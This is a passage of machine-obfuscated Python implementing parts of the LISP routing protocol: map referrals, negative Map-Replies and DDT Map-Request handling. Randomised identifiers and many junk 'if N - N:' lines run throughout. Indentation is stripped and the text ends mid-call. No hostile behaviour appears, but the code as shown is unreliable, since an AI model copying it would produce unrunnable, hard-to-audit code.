if 10 - 10: iII111i - i11iIiiIii - i11iIiiIii / ooOoO0o
if 76 - 76: IiII % OOooOOo
if 34 - 34: I1IiiI
if 56 - 56: OoooooooOO + O0 . II111iiii / i1IIi - O0 . iIii1I11I1II1
if 94 - 94: i1IIi . Oo0Ooo / o0oOOo0O0Ooo % I1Ii111 / OOooOOo + OoOoOO00
if 21 - 21: Oo0Ooo / Oo0Ooo
if 1 - 1: Oo0Ooo
def lisp_ms_compute_neg_prefix ( eid , group ) :
I111Ii1 = lisp_address ( eid . afi , "" , 0 , 0 )
I111Ii1 . copy_address ( eid )
I111Ii1 . mask_len = 0
O0ooOOoOoOO0 = lisp_address ( group . afi , "" , 0 , 0 )
O0ooOOoOoOO0 . copy_address ( group )
O0ooOOoOoOO0 . mask_len = 0
o000Oo0 = None
if 80 - 80: II111iiii - I1ii11iIi11i / iIii1I11I1II1 % Oo0Ooo . Ii1I
if 33 - 33: OOooOOo + I1ii11iIi11i + I1Ii111 * I11i / OoO0O00 + o0oOOo0O0Ooo
if 46 - 46: iII111i
if 56 - 56: Oo0Ooo / II111iiii
if 61 - 61: Ii1I - i1IIi / ooOoO0o - Oo0Ooo / IiII % Oo0Ooo
if ( group . is_null ( ) ) :
o0OOO0 = lisp_ddt_cache . lookup_cache ( eid , False )
if ( o0OOO0 == None ) :
I111Ii1 . mask_len = I111Ii1 . host_mask_len ( )
O0ooOOoOoOO0 . mask_len = O0ooOOoOoOO0 . host_mask_len ( )
return ( [ I111Ii1 , O0ooOOoOoOO0 , LISP_DDT_ACTION_NOT_AUTH ] )
if 53 - 53: OoooooooOO + iII111i % II111iiii * IiII
iI1Ii1i1IIi = lisp_sites_by_eid
if ( o0OOO0 . is_auth_prefix ( ) ) : o000Oo0 = o0OOO0 . eid
else :
o0OOO0 = lisp_ddt_cache . lookup_cache ( group , False )
if ( o0OOO0 == None ) :
I111Ii1 . mask_len = I111Ii1 . host_mask_len ( )
O0ooOOoOoOO0 . mask_len = O0ooOOoOoOO0 . host_mask_len ( )
return ( [ I111Ii1 , O0ooOOoOoOO0 , LISP_DDT_ACTION_NOT_AUTH ] )
if 59 - 59: OoO0O00 - oO0o - Ii1I + ooOoO0o
if ( o0OOO0 . is_auth_prefix ( ) ) : o000Oo0 = o0OOO0 . group
if 34 - 34: oO0o + I1Ii111 . OOooOOo
group , o000Oo0 , O0ooOOoOoOO0 = lisp_sites_by_eid . walk_cache ( lisp_neg_prefix_walk , ( group , o000Oo0 , O0ooOOoOoOO0 ) )
if 78 - 78: i1IIi + IiII
if 55 - 55: I1Ii111 - I11i - iIii1I11I1II1 / ooOoO0o % oO0o / II111iiii
O0ooOOoOoOO0 . mask_address ( O0ooOOoOoOO0 . mask_len )
if 22 - 22: OoooooooOO % OOooOOo . OOooOOo
lprint ( ( "Least specific prefix computed from site-cache for " + "group EID {} using auth-prefix {} is {}" ) . format ( group . print_address ( ) , o000Oo0 . print_prefix ( ) if ( o000Oo0 != None ) else "'not found'" ,
# iII111i - OoO0O00 % I1ii11iIi11i * Oo0Ooo
# OoO0O00 / O0 / o0oOOo0O0Ooo . I1IiiI
# OoO0O00 * iIii1I11I1II1 * I1IiiI . OoooooooOO + I1ii11iIi11i % iIii1I11I1II1
O0ooOOoOoOO0 . print_prefix ( ) ) )
if 78 - 78: OoOoOO00 . oO0o - Oo0Ooo - II111iiii - I1ii11iIi11i * oO0o
iI1Ii1i1IIi = o0OOO0 . source_cache
if 41 - 41: I11i / ooOoO0o + IiII % OoooooooOO
if 72 - 72: Ii1I
if 22 - 22: o0oOOo0O0Ooo / OoO0O00 + OoOoOO00 + Ii1I . II111iiii * I11i
if 85 - 85: i11iIiiIii / I11i
if 28 - 28: i11iIiiIii + IiII / I11i . Ii1I / OoO0O00
I11I1iI = LISP_DDT_ACTION_DELEGATION_HOLE if ( o000Oo0 != None ) else LISP_DDT_ACTION_NOT_AUTH
if 100 - 100: o0oOOo0O0Ooo - I11i . o0oOOo0O0Ooo
if 90 - 90: OoOoOO00 / II111iiii / I11i * I11i - iIii1I11I1II1
if 87 - 87: IiII
if 92 - 92: OoO0O00 / IiII - ooOoO0o
if 45 - 45: iII111i - I11i * ooOoO0o * OOooOOo / I1Ii111 * iII111i
if 33 - 33: iIii1I11I1II1 % I1ii11iIi11i - OOooOOo % iIii1I11I1II1 + I11i / i11iIiiIii
eid , o000Oo0 , I111Ii1 = iI1Ii1i1IIi . walk_cache ( lisp_neg_prefix_walk ,
( eid , o000Oo0 , I111Ii1 ) )
if 64 - 64: I11i * ooOoO0o / OoooooooOO
if 38 - 38: iIii1I11I1II1 . OoO0O00 * OoOoOO00 + OoOoOO00 + ooOoO0o
if 44 - 44: I1ii11iIi11i * OOooOOo % OoO0O00 . I1IiiI % Ii1I + II111iiii
if 100 - 100: oO0o - II111iiii . o0oOOo0O0Ooo
I111Ii1 . mask_address ( I111Ii1 . mask_len )
if 63 - 63: OoOoOO00 % IiII . iII111i
lprint ( ( "Least specific prefix computed from site-cache for EID {} " + "using auth-prefix {} is {}" ) . format ( green ( eid . print_address ( ) , False ) ,
# I1IiiI . O0 / oO0o
# I1IiiI - OoO0O00 / iIii1I11I1II1 * iII111i + OoOoOO00 + IiII
o000Oo0 . print_prefix ( ) if ( o000Oo0 != None ) else "'not found'" , I111Ii1 . print_prefix ( ) ) )
if 16 - 16: OoO0O00 % OOooOOo . I11i . I11i
if 4 - 4: O0 + I11i / OoOoOO00 * iIii1I11I1II1 . Ii1I
return ( [ I111Ii1 , O0ooOOoOoOO0 , I11I1iI ] )
if 68 - 68: Oo0Ooo % ooOoO0o + i11iIiiIii / oO0o / II111iiii
if 63 - 63: OoO0O00 % i1IIi - OoooooooOO / ooOoO0o
if 75 - 75: OOooOOo + IiII + ooOoO0o / I1IiiI . iIii1I11I1II1 / Oo0Ooo
if 81 - 81: I1Ii111 % II111iiii - Oo0Ooo / I1IiiI + i11iIiiIii . I11i
if 67 - 67: ooOoO0o . I1Ii111 . Oo0Ooo . Ii1I + iIii1I11I1II1 / OoooooooOO
if 93 - 93: ooOoO0o * OoO0O00 - I1Ii111 / I1ii11iIi11i
if 60 - 60: OoO0O00 / oO0o . I1IiiI + OoOoOO00 + I1ii11iIi11i % Ii1I
if 70 - 70: i1IIi * II111iiii * I1IiiI
def lisp_ms_send_map_referral ( lisp_sockets , map_request , ecm_source , port ,
action , eid_prefix , group_prefix ) :
if 7 - 7: OoooooooOO + II111iiii % o0oOOo0O0Ooo * O0 . OoO0O00 * OoooooooOO
ooOOoo0 = map_request . target_eid
IIi1iiIII11 = map_request . target_group
Iii11I = map_request . nonce
if 20 - 20: Oo0Ooo % OOooOOo
if ( action == LISP_DDT_ACTION_MS_ACK ) : oOoooOOO0o0 = 1440
if 8 - 8: OOooOOo
if 92 - 92: iII111i / OOooOOo . IiII / I11i + o0oOOo0O0Ooo
if 99 - 99: II111iiii
if 70 - 70: O0 % I1ii11iIi11i
iiII1IiIi1i = lisp_map_referral ( )
iiII1IiIi1i . record_count = 1
iiII1IiIi1i . nonce = Iii11I
IiiiIi1iiii11 = iiII1IiIi1i . encode ( )
iiII1IiIi1i . print_map_referral ( )
if 28 - 28: IiII - i1IIi - I1Ii111 % Ii1I - IiII
O0II = False
if 73 - 73: iIii1I11I1II1 . iIii1I11I1II1 + oO0o % i11iIiiIii . IiII
if 33 - 33: IiII - OOooOOo / i11iIiiIii * iIii1I11I1II1
if 2 - 2: i11iIiiIii % ooOoO0o
if 56 - 56: IiII % ooOoO0o + I1IiiI % I11i - OOooOOo
if 82 - 82: OoooooooOO . i1IIi . OoO0O00 . OoO0O00
if 31 - 31: iIii1I11I1II1
if ( action == LISP_DDT_ACTION_SITE_NOT_FOUND ) :
eid_prefix , group_prefix , action = lisp_ms_compute_neg_prefix ( ooOOoo0 ,
IIi1iiIII11 )
oOoooOOO0o0 = 15
if 64 - 64: ooOoO0o
if ( action == LISP_DDT_ACTION_MS_NOT_REG ) : oOoooOOO0o0 = 1
if ( action == LISP_DDT_ACTION_MS_ACK ) : oOoooOOO0o0 = 1440
if ( action == LISP_DDT_ACTION_DELEGATION_HOLE ) : oOoooOOO0o0 = 15
if ( action == LISP_DDT_ACTION_NOT_AUTH ) : oOoooOOO0o0 = 0
if 30 - 30: OoO0O00 + o0oOOo0O0Ooo / iIii1I11I1II1
O0OoO0O0 = False
iI11i = 0
o0OOO0 = lisp_ddt_cache_lookup ( ooOOoo0 , IIi1iiIII11 , False )
if ( o0OOO0 != None ) :
iI11i = len ( o0OOO0 . delegation_set )
O0OoO0O0 = o0OOO0 . is_ms_peer_entry ( )
o0OOO0 . map_referrals_sent += 1
if 79 - 79: I11i * I1ii11iIi11i
if 85 - 85: iIii1I11I1II1 * O0 / iII111i
if 75 - 75: Oo0Ooo * IiII % Ii1I
if 40 - 40: o0oOOo0O0Ooo * i11iIiiIii . ooOoO0o
if 63 - 63: I1Ii111 / Ii1I - iIii1I11I1II1 / i11iIiiIii / IiII + I11i
if ( action == LISP_DDT_ACTION_NOT_AUTH ) : O0II = True
if ( action in ( LISP_DDT_ACTION_MS_REFERRAL , LISP_DDT_ACTION_MS_ACK ) ) :
O0II = ( O0OoO0O0 == False )
if 57 - 57: iIii1I11I1II1 % iIii1I11I1II1
if 23 - 23: II111iiii . ooOoO0o % I1Ii111
if 39 - 39: OoooooooOO
if 10 - 10: Oo0Ooo * iII111i
if 78 - 78: Oo0Ooo / i11iIiiIii - I1IiiI
i111iII = lisp_eid_record ( )
i111iII . rloc_count = iI11i
i111iII . authoritative = True
i111iII . action = action
i111iII . ddt_incomplete = O0II
i111iII . eid = eid_prefix
i111iII . group = group_prefix
i111iII . record_ttl = oOoooOOO0o0
if 51 - 51: ooOoO0o / Oo0Ooo - I1Ii111 - iII111i
IiiiIi1iiii11 += i111iII . encode ( )
i111iII . print_record ( " " , True )
if 68 - 68: I1ii11iIi11i - iIii1I11I1II1 * OoooooooOO
if 44 - 44: OoooooooOO + I1Ii111 + OoO0O00
if 15 - 15: iIii1I11I1II1 % i1IIi + iII111i
if 48 - 48: o0oOOo0O0Ooo / oO0o
if ( iI11i != 0 ) :
for I1IooOoo00 in o0OOO0 . delegation_set :
I1Ii11iI = lisp_rloc_record ( )
I1Ii11iI . rloc = I1IooOoo00 . delegate_address
I1Ii11iI . priority = I1IooOoo00 . priority
I1Ii11iI . weight = I1IooOoo00 . weight
I1Ii11iI . mpriority = 255
I1Ii11iI . mweight = 0
I1Ii11iI . reach_bit = True
IiiiIi1iiii11 += I1Ii11iI . encode ( )
I1Ii11iI . print_record ( " " )
if 61 - 61: I1IiiI + iII111i * Ii1I % I1Ii111 . Ii1I
if 83 - 83: i11iIiiIii * OoOoOO00 * i11iIiiIii % II111iiii . i11iIiiIii * I11i
if 67 - 67: i1IIi / i1IIi + IiII . oO0o
if 70 - 70: i1IIi . I11i * o0oOOo0O0Ooo . iII111i
if 75 - 75: oO0o * OoO0O00 * I11i + oO0o + O0 . I1Ii111
if 8 - 8: I1ii11iIi11i / i1IIi - I1ii11iIi11i + Ii1I + OoO0O00 - I11i
if 79 - 79: OoooooooOO - I1Ii111 * I1IiiI . I1Ii111 - iIii1I11I1II1
if ( map_request . nonce != 0 ) : port = LISP_CTRL_PORT
lisp_send_map_referral ( lisp_sockets , IiiiIi1iiii11 , ecm_source , port )
return
if 27 - 27: OoOoOO00 % OoOoOO00 % II111iiii
if 45 - 45: iIii1I11I1II1 . o0oOOo0O0Ooo % I1IiiI
if 10 - 10: I1IiiI / i1IIi * o0oOOo0O0Ooo + Oo0Ooo - OoOoOO00 % iII111i
if 88 - 88: Ii1I % Ii1I
if 29 - 29: OOooOOo % I1ii11iIi11i
if 57 - 57: I1ii11iIi11i - OoOoOO00 + IiII
if 58 - 58: OOooOOo % I1IiiI / oO0o . ooOoO0o . OoO0O00 / IiII
if 72 - 72: ooOoO0o + ooOoO0o + o0oOOo0O0Ooo - o0oOOo0O0Ooo % Ii1I
def lisp_send_negative_map_reply ( sockets , eid , group , nonce , dest , port , ttl ,
xtr_id , pubsub ) :
if 52 - 52: I11i % i1IIi . I1ii11iIi11i
lprint ( "Build negative Map-Reply EID-prefix {}, nonce 0x{} to ITR {}" . format ( lisp_print_eid_tuple ( eid , group ) , lisp_hex_string ( nonce ) ,
# oO0o / I1ii11iIi11i * O0 % I11i
red ( dest . print_address ( ) , False ) ) )
if 34 - 34: oO0o / O0 * oO0o
I11I1iI = LISP_NATIVE_FORWARD_ACTION if group . is_null ( ) else LISP_DROP_ACTION
if 47 - 47: iIii1I11I1II1 - o0oOOo0O0Ooo % Ii1I
if 38 - 38: ooOoO0o / IiII * I1ii11iIi11i % I1ii11iIi11i % oO0o
if 82 - 82: I1ii11iIi11i . i11iIiiIii - I11i . iII111i / OOooOOo
if 60 - 60: I1IiiI / I1IiiI / II111iiii
if 59 - 59: OOooOOo . oO0o + ooOoO0o % o0oOOo0O0Ooo . i11iIiiIii
if ( lisp_get_eid_hash ( eid ) != None ) :
I11I1iI = LISP_SEND_MAP_REQUEST_ACTION
if 27 - 27: OoOoOO00 - OoooooooOO / IiII / II111iiii * OOooOOo * ooOoO0o
if 43 - 43: II111iiii . IiII - I1IiiI * I1ii11iIi11i + OoooooooOO
IiiiIi1iiii11 = lisp_build_map_reply ( eid , group , [ ] , nonce , I11I1iI , ttl , None ,
None , False , False )
if 34 - 34: I1Ii111 / i1IIi
if 95 - 95: OoOoOO00 * OOooOOo
if 68 - 68: I1Ii111 / iIii1I11I1II1 % Ii1I
if 77 - 77: i11iIiiIii + i11iIiiIii - I1ii11iIi11i % I1ii11iIi11i
if ( pubsub ) :
lisp_process_pubsub ( sockets , IiiiIi1iiii11 , eid , dest , port , nonce , ttl ,
xtr_id )
else :
lisp_send_map_reply ( sockets , IiiiIi1iiii11 , dest , port )
if 26 - 26: oO0o + OoooooooOO % o0oOOo0O0Ooo
return
if 96 - 96: ooOoO0o * OoOoOO00 - II111iiii
if 40 - 40: oO0o * OOooOOo + Ii1I + I11i * Ii1I + OoooooooOO
if 77 - 77: OOooOOo + ooOoO0o / O0
if 16 - 16: ooOoO0o + Oo0Ooo * Oo0Ooo . I11i - IiII
if 49 - 49: ooOoO0o . Ii1I
if 75 - 75: OOooOOo / II111iiii - Oo0Ooo + I1Ii111
if 42 - 42: OoooooooOO * II111iiii + Ii1I % OoO0O00 / I1Ii111
def lisp_retransmit_ddt_map_request ( mr ) :
I1IIiiiI1I1iiIii = mr . mr_source . print_address ( )
O0i1111ii1 = mr . print_eid_tuple ( )
Iii11I = mr . nonce
if 11 - 11: Ii1I - IiII
if 20 - 20: I11i % oO0o * Oo0Ooo - I1Ii111 . Ii1I * I1ii11iIi11i
if 59 - 59: OoOoOO00 + Oo0Ooo . I1ii11iIi11i - Ii1I
if 48 - 48: I1Ii111 % Ii1I + I1IiiI * OoooooooOO % OoOoOO00 % i11iIiiIii
if 13 - 13: iII111i % i1IIi
if ( mr . last_request_sent_to ) :
I1Ii = mr . last_request_sent_to . print_address ( )
IiII111IiII1 = lisp_referral_cache_lookup ( mr . last_cached_prefix [ 0 ] ,
mr . last_cached_prefix [ 1 ] , True )
if ( IiII111IiII1 and IiII111IiII1 . referral_set . has_key ( I1Ii ) ) :
IiII111IiII1 . referral_set [ I1Ii ] . no_responses += 1
if 36 - 36: OoO0O00 . Oo0Ooo * I1ii11iIi11i
if 16 - 16: IiII + OOooOOo
if 33 - 33: ooOoO0o . i11iIiiIii + OOooOOo
if 77 - 77: OoooooooOO * Ii1I * iIii1I11I1II1 + IiII
if 53 - 53: IiII + I1Ii111 + oO0o
if 31 - 31: OOooOOo + OoOoOO00 * OOooOOo + OoOoOO00 / o0oOOo0O0Ooo . iIii1I11I1II1
if 1 - 1: I1Ii111 * i11iIiiIii % I1Ii111 - OoO0O00 + I1Ii111 / Oo0Ooo
if ( mr . retry_count == LISP_MAX_MAP_NOTIFY_RETRIES ) :
lprint ( "DDT Map-Request retry limit reached for EID {}, nonce 0x{}" . format ( green ( O0i1111ii1 , False ) , lisp_hex_string ( Iii11I ) ) )
if 3 - 3: OOooOOo - i11iIiiIii / I1Ii111 . OOooOOo - OoO0O00
mr . dequeue_map_request ( )
return
if 60 - 60: OoOoOO00 / i1IIi . Ii1I - OoO0O00 - OoooooooOO
if 39 - 39: I1IiiI + i1IIi * OoO0O00 % I11i
mr . retry_count += 1
if 41 - 41: I1ii11iIi11i * IiII
IiII1iiI = green ( I1IIiiiI1I1iiIii , False )
OooOOOoOoo0O0 = green ( O0i1111ii1 , False )
lprint ( "Retransmit DDT {} from {}ITR {} EIDs: {} -> {}, nonce 0x{}" . format ( bold ( "Map-Request" , False ) , "P" if mr . from_pitr else "" ,
# IiII
red ( mr . itr . print_address ( ) , False ) , IiII1iiI , OooOOOoOoo0O0 ,
lisp_hex_string ( Iii11I ) ) )
if 70 - 70: iIii1I11I1II1 / I1IiiI * OoOoOO00 / IiII / II111iiii + I1IiiI
if 33 - 33: oO0o
if 1 - 1: OoOoOO00 . i11iIiiIii % I1Ii111 + OoooooooOO - Oo0Ooo . I1ii11iIi11i
if 46 - 46: i11iIiiIii + I11i - iIii1I11I1II1 / OoO0O00 - ooOoO0o / i1IIi
lisp_send_ddt_map_request ( mr , False )
if 44 - 44: o0oOOo0O0Ooo + Oo0Ooo
if 46 - 46: OOooOOo % I1IiiI
if 66 - 66: iIii1I11I1II1 . o0oOOo0O0Ooo - ooOoO0o
if 27 - 27: Oo0Ooo - i1IIi * OoooooooOO - OoOoOO00 + OoOoOO00
mr . retransmit_timer = threading . Timer ( LISP_DDT_MAP_REQUEST_INTERVAL ,
lisp_retransmit_ddt_map_request , [ mr ] )
mr . retransmit_timer . start ( )
return
if 24 - 24: i1IIi . OoOoOO00 / I1Ii111 + O0
if 86 - 86: Ii1I * OoOoOO00 % I1ii11iIi11i + OOooOOo
if 85 - 85: iII111i % i11iIiiIii
if 78 - 78: i11iIiiIii / I11i / Oo0Ooo + II111iiii - I1ii11iIi11i / I1ii11iIi11i
if 28 - 28: iIii1I11I1II1 / IiII - iIii1I11I1II1 . i1IIi - O0 * ooOoO0o
if 41 - 41: Ii1I + IiII
if 37 - 37: I1Ii111 / o0oOOo0O0Ooo - ooOoO0o - OoooooooOO . I1ii11iIi11i % I1Ii111
if 53 - 53: I1IiiI % OOooOOo + Ii1I - Ii1I
def lisp_get_referral_node ( referral , source_eid , dest_eid ) :
if 99 - 99: i1IIi * OoOoOO00 - i1IIi
if 65 - 65: OoO0O00 / i11iIiiIii + I1ii11iIi11i + OoOoOO00
if 82 - 82: Ii1I * OOooOOo % ooOoO0o / OoO0O00 - Oo0Ooo . I1Ii111
if 90 - 90: I11i * i11iIiiIii % i1IIi + I1Ii111 / OoO0O00
IIiI11 = [ ]
for iiI111I in referral . referral_set . values ( ) :
if ( iiI111I . updown == False ) : continue
if ( len ( IIiI11 ) == 0 or IIiI11 [ 0 ] . priority == iiI111I . priority ) :
IIiI11 . append ( iiI111I )
elif ( IIiI11 [ 0 ] . priority > iiI111I . priority ) :
IIiI11 = [ ]
IIiI11 . append ( iiI111I )
if 28 - 28: I11i - iII111i - OOooOOo - ooOoO0o
if 68 - 68: I11i + Ii1I
if 70 - 70: I11i + oO0o + o0oOOo0O0Ooo . I1Ii111 * i11iIiiIii
IiiIiiiIiIi = len ( IIiI11 )
if ( IiiIiiiIiIi == 0 ) : return ( None )
if 94 - 94: I1Ii111 * I1ii11iIi11i / iII111i
IIi1iiIIi1i = dest_eid . hash_address ( source_eid )
IIi1iiIIi1i = IIi1iiIIi1i % IiiIiiiIiIi
return ( IIiI11 [ IIi1iiIIi1i ] )
if 78 - 78: ooOoO0o
if 73 - 73: OoOoOO00 . OoOoOO00
if 1 - 1: I1ii11iIi11i % o0oOOo0O0Ooo % i11iIiiIii - OOooOOo - ooOoO0o - OoO0O00
if 94 - 94: OoO0O00 . Oo0Ooo / OoO0O00 + I1Ii111
if 48 - 48: I1ii11iIi11i * i1IIi + I1Ii111
if 80 - 80: I1IiiI % I11i
if 64 - 64: OOooOOo + i11iIiiIii + I1IiiI . I11i % I11i - o0oOOo0O0Ooo
def lisp_send_ddt_map_request ( mr , send_to_root ) :
IiIiI = mr . lisp_sockets
Iii11I = mr . nonce
I11iiII1I1111 = mr . itr
iiIi1ii = mr . mr_source
I11i11i1 = mr . print_eid_tuple ( )
if 37 - 37: I1Ii111 % i1IIi / i11iIiiIii + OoO0O00 % OOooOOo
if 12 - 12: Oo0Ooo + i1IIi + II111iiii
if 71 - 71: i11iIiiIii - iII111i . I1IiiI
if 31 - 31: iIii1I11I1II1 - i11iIiiIii - I1ii11iIi11i * I1Ii111 % oO0o + I1IiiI
if 25 - 25: OOooOOo + iII111i * I1Ii111
if ( mr . send_count == 8 ) :
lprint ( "Giving up on map-request-queue entry {}, nonce 0x{}" . format ( green ( I11i11i1 , False ) , lisp_hex_string ( Iii11I ) ) )
if 93 - 93: i1IIi - i1IIi
mr . dequeue_map_request ( )
return
if 30 - 30: OoooooooOO
if 37 - 37: O0 * I11i . O0 / II111iiii % oO0o
if 19 - 19: Ii1I - oO0o
if 72 - 72: oO0o / I11i % II111iiii
if 22 - 22: i11iIiiIii % IiII % IiII % I11i - OoooooooOO + I1IiiI
if 31 - 31: I11i + I1ii11iIi11i . i1IIi * i11iIiiIii + I1ii11iIi11i
if ( send_to_root ) :
O00o0oOoO0OOo = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
i1IiiI = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
mr . tried_root = True
lprint ( "Jumping up to root for EID {}" . format ( green ( I11i11i1 , False ) ) )
else :
O00o0oOoO0OOo = mr . eid
i1IiiI = mr . group
if 43 - 43: OoO0O00
if 51 - 51: OoooooooOO % IiII % Oo0Ooo
if 50 - 50: I1IiiI - i11iIiiIii / I1ii11iIi11i . Ii1I - iIii1I11I1II1
if 91 - 91: I1IiiI . I1Ii111 + II111iiii . Oo0Ooo
if 95 - 95: iII111i
oo0oooo00OOO = lisp_referral_cache_lookup ( O00o0oOoO0OOo , i1IiiI , False )
if ( oo0oooo00OOO == None ) :
lprint ( "No referral cache entry found" )
lisp_send_negative_map_reply ( IiIiI , O00o0oOoO0OOo , i1IiiI ,
Iii11I , I11iiII1I1111 , mr . sport , 15 , None , False )
return
if 80 - 80: ooOoO0o / OOooOOo / Ii1I * i1IIi . I11i
if 47 - 47: I1ii11iIi11i
iioOoo = oo0oooo00OOO . print_eid_tuple ( )
lprint ( "Found referral cache entry {}, referral-type: {}" . format ( iioOoo ,
oo0oooo00OOO . print_referral_type ( ) ) )
if 90 - 90: i11iIiiIii % II111iiii % I1IiiI % Ii1I / II111iiii
iiI111I = lisp_get_referral_node ( oo0oooo00OOO , iiIi1ii , mr . eid )
if ( iiI111I == None ) :
lprint ( "No reachable referral-nodes found" )
mr . dequeue_map_request ( )
lisp_send_negative_map_reply ( IiIiI , oo0oooo00OOO . eid ,
oo0oooo00OOO . group , Iii11I , I11iiII1I1111 , mr . sport , 1 , None , False )
return
if 80 - 80: Oo0Ooo . I1IiiI / I1IiiI
if 9 - 9: OoO0O00 % OoooooooOO
lprint ( "Send DDT Map-Request to {} {} for EID {}, nonce 0x{}" . format ( iiI111I . referral_address . print_address ( ) ,
# o0oOOo0O0Ooo
oo0oooo00OOO . print_referral_type ( ) , green ( I11i11i1 , False ) ,
lisp_hex_string ( Iii11I ) ) )
if 94 - 94: O0 + OOooOOo . iIii1I11I1II1 / Oo0Ooo * OoOoOO00 . i11iIiiIii
if 41 - 41: o0oOOo0O0Ooo - IiII / OOooOOo * OoO0O00
if 48 - 48: OoooooooOO
if 31 - 31: oO0o / I1Ii111 + i1IIi % OoooooooOO + i1IIi
i1Ii1II = ( oo0oooo00OOO . referral_type == LISP_DDT_ACTION_MS_REFERRAL or
oo0oooo00OOO . referral_type == LISP_DDT_ACTION_MS_ACK )
lisp_send_ecm ( IiIiI , mr . packet , iiIi1ii , mr . sport , mr . eid ,
iiI111I . referral_address , to_ms = i1Ii1II , ddt = True )
if 51 - 51: oO0o
if 30 - 30: oO0o * II111iiii + OOooOOo
if 98 - 98: OoooooooOO - O0
if 42 - 42: OoooooooOO * I11i * IiII
mr . last_request_sent_to = iiI111I . referral_address
mr . last_sent = lisp_get_timestamp ( )
mr . send_count += 1
iiI111I . map_requests_sent += 1
return
if 41 - 41: ooOoO0o % i11iIiiIii
if 69 - 69: IiII - oO0o
if 21 - 21: Oo0Ooo / I1Ii111
if 72 - 72: OoOoOO00 . i11iIiiIii
if 25 - 25: i1IIi
if 69 - 69: OOooOOo / Ii1I
if 67 - 67: i11iIiiIii . II111iiii + OoooooooOO % o0oOOo0O0Ooo + IiII * i1IIi
if 53 - 53: oO0o * OoooooooOO + II111iiii . IiII * I1ii11iIi11i
def lisp_mr_process_map_request ( lisp_sockets , packet , map_request , ecm_source ,
sport , mr_source ) :
if 55 - 55: OoOoOO00
ooOOoo0 = map_request . target_eid
IIi1iiIII11 = map_request . target_group
O0i1111ii1 = map_request . print_eid_tuple ( )
I1IIiiiI1I1iiIii = mr_source . print_address ( )
Iii11I = map_request . nonce
if 27 - 27: I1IiiI
IiII1iiI = green ( I1IIiiiI1I1iiIii , False )
OooOOOoOoo0O0 = green ( O0i1111ii1 , False )
lprint ( "Received Map-Request from {}ITR {} EIDs: {} -> {}, nonce 0x{}" . format ( "P" if map_request . pitr_bit else "" ,
# Oo0Ooo . o0oOOo0O0Ooo + i1IIi * O0 + Oo0Ooo
red ( ecm_source . print_address ( ) , False ) , IiII1iiI , OooOOOoOoo0O0 ,
lisp_hex_string ( Iii11I ) ) )
if 96 - 96: OoooooooOO * IiII . OoOoOO00
if 64 - 64: I1Ii111
if 96 - 96: Ii1I
if 100 - 100: ooOoO0o
I1I1iiii111II = lisp_ddt_map_request ( lisp_sockets , packet , ooOOoo0 , IIi1iiIII11 , Iii11I )
I1I1iiii111II . packet = packet
I1I1iiii111II . itr = ecm_source
I1I1iiii111II . mr_source = mr_source
I1I1iiii111II . sport = sport
I1I1iiii111II . from_pitr = map_request . pitr_bit
I1I1iiii111II . queue_map_request ( )
if 40 - 40: O0 * oO0o - OoooooooOO - o0oOOo0O0Ooo * OoO0O00
lisp_send_ddt_map_request ( I1I1iiii111II , False )
return
if 38 - 38: I1ii11iIi11i / I1ii11iIi11i % I1Ii111 % i11iIiiIii . OoOoOO00 * OoooooooOO
if 53 - 53: II111iiii . i11iIiiIii / oO0o - i11iIiiIii * iII111i . I11i
if 40 - 40: i11iIiiIii . OOooOOo / II111iiii
if 29 - 29: OoO0O00 * o0oOOo0O0Ooo - OoooooooOO - OoOoOO00 / o0oOOo0O0Ooo
if 89 - 89: Ii1I . iIii1I11I1II1 / OOooOOo + I1IiiI * II111iiii . OOooOOo
if 68 - 68: IiII * IiII + oO0o / o0oOOo0O0Ooo
if 41 - 41: OoOoOO00 - O0
def lisp_process_map_request ( lisp_sockets , packet , ecm_source , ecm_port ,
mr_source , mr_port , ddt_request , ttl , timestamp ) :
if 48 - 48: OoooooooOO % Ii1I * OoO0O00 / I1ii11iIi11i
OoO = packet
o0OOo0 = lisp_map_request ( )
packet = o0OOo0 . decode ( packet , mr_source , mr_port )
if ( packet == None ) :
lprint ( "Could not decode Map-Request packet" )
return
if 55 - 55: i11iIiiIii + I11i % oO0o * O0
if 19 - 19: oO0o . i1IIi . Oo0Ooo
o0OOo0 . print_map_request ( )
if 59 - 59: i1IIi / Ii1I . I1ii11iIi11i % II111iiii
if 12 - 12: OoO0O00
if 10 - 10: I1Ii111 / OoooooooOO / OoO0O00 * ooOoO0o
if 81 - 81: i1IIi % I11i * iIii1I11I1II1
if ( o0OOo0 . rloc_probe ) :
lisp_process_rloc_probe_request ( lisp_sockets , o0OOo0 , mr_source ,
mr_port , ttl , timestamp )
return
if 39 - 39: iIii1I11I1II1 / O0 . OoooooooOO - O0 . OoO0O00 . oO0o
if 59 - 59: II111iiii * I1IiiI
if 12 - 12: i11iIiiIii - IiII . iII111i . Ii1I
if 34 - 34: i1IIi % iII111i + Oo0Ooo * OoOoOO00 + OoO0O00
if 37 - 37: I1Ii111 / OoooooooOO
if ( o0OOo0 . smr_bit ) :
lisp_process_smr ( o0OOo0 )
if 19 - 19: Ii1I - O0 + I1IiiI + OoooooooOO + ooOoO0o - Oo0Ooo
if 45 - 45: I1IiiI . OoOoOO00 . OoOoOO00
if 20 - 20: OoOoOO00
if 69 - 69: OoOoOO00 * Ii1I % ooOoO0o . OoOoOO00 / oO0o * I1Ii111
if 93 - 93: OoO0O00 % IiII % ooOoO0o . I1IiiI
if ( o0OOo0 . smr_invoked_bit ) :
lisp_process_smr_invoked_request ( o0OOo0 )
if 96 - 96: II111iiii
if 73 - 73: II111iiii
if 81 - 81: I1IiiI + OoO0O00
if 22 - 22: OoO0O00 * OoOoOO00 * I11i * IiII . OoO0O00 . I1ii11iIi11i
if 32 - 32: o0oOOo0O0Ooo - iII111i + i11iIiiIii / ooOoO0o . OoOoOO00 . IiII
if ( lisp_i_am_etr ) :
lisp_etr_process_map_request ( lisp_sockets , o0OOo0 , mr_source ,
mr_port , ttl , timestamp )
if 9 - 9: iIii1I11I1II1
if 66 - 66: iIii1I11I1II1
if 13 - 13: O0 / ooOoO0o
if 64 - 64: i11iIiiIii + I1IiiI / Oo0Ooo - iII111i
if 26 - 26: I1ii11iIi11i
if ( lisp_i_am_ms ) :
packet = OoO
ooOOoo0 , IIi1iiIII11 , O0ooOo0O0ooo0 = lisp_ms_process_map_request ( lisp_sockets ,
OoO , o0OOo0 , mr_source , mr_port , ecm_source )
if ( ddt_request ) :
lisp_ms_send_map_referral ( lisp_sockets , o0OOo0 , ecm_source ,
